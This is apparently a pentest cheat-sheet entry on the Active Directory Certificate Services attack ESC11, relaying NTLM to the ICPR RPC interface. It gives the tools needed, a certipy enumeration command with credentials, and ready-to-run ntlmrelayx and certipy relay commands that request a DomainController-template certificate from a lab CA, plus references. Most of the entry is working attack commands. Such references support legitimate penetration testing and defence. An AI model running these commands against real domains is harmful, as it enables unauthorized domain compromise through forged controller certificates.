Active Directory - Certificate ESC11

ESC11 - Relaying NTLM to ICPR

Encryption is not enforced for ICPR requests and Request Disposition is set to Issue.

Requirements:

• sploutchy/Certipy - Certipy fork
• sploutchy/impacket - Impacket fork

Exploitation:

1. Look for Enforce Encryption for Requests: Disabled in certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout output

2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.

   ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
   certipy relay -target rpc://dc.domain.local -ca 'DOMAIN-CA' -template DomainController
   

References

• GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025
• Relaying to AD Certificate Services over RPC - SYLVAIN HEINIGER - November 16, 2022

Share this content